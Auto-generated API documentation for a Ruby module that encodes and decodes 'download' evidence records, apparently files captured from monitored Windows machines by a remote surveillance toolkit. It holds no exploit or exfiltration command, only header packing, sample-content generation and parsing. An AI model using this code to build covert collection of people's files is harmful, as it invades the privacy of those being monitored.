Module: RCS::DownloadEvidence

Defined in:

lib/rcs-common/evidence/download.rb

Constant Summary

FILECAP_VERSION =

2008122901

Instance Method Summary

• #additional_header ⇒ Object
• #content ⇒ Object
• #decode_additional_header(data) ⇒ Object
• #decode_content(common_info, chunks) {|info| ... } ⇒ Object
• #generate_content ⇒ Object

Instance Method Details

#additional_header ⇒ Object

# File 'lib/rcs-common/evidence/download.rb', line 20

def additional_header
  file_name = 'C:\\Users\\Bad Guy\\filedownload...'.to_utf16le_binary
  header = StringIO.new
  header.write [FILECAP_VERSION, file_name.size].pack("I*")
  header.write file_name
  
  header.string
end

#content ⇒ Object

# File 'lib/rcs-common/evidence/download.rb', line 11

def content
  path = File.join(File.dirname(__FILE__), 'content', ['screenshot', 'print', 'camera', 'mouse', 'url'].sample, '001.jpg')
  File.open(path, 'rb') {|f| f.read }
end

#decode_additional_header(data) ⇒ Object

Raises:

• (EvidenceDeserializeError)

# File 'lib/rcs-common/evidence/download.rb', line 29

def decode_additional_header(data)
  raise EvidenceDeserializeError.new("incomplete DOWNLOAD") if data.nil? or data.bytesize == 0

  binary = StringIO.new data

  version, file_name_len = binary.read(8).unpack("I*")
  raise EvidenceDeserializeError.new("invalid log version for DOWNLOAD") unless version == FILECAP_VERSION

  ret = Hash.new
  ret[:data] = Hash.new
  ret[:data][:path] = binary.read(file_name_len).utf16le_to_utf8
  return ret
end

#decode_content(common_info, chunks) {|info| ... } ⇒ Object

Yields:

• (info)

# File 'lib/rcs-common/evidence/download.rb', line 43

def decode_content(common_info, chunks)
  info = Hash[common_info]
  info[:data] = Hash.new if info[:data].nil?
  info[:data][:type] = :capture
  info[:grid_content] = chunks.join
  info[:data][:size] = info[:grid_content].bytesize
  yield info if block_given?
  :delete_raw
end

#generate_content ⇒ Object

# File 'lib/rcs-common/evidence/download.rb', line 16

def generate_content
  [ content ]
end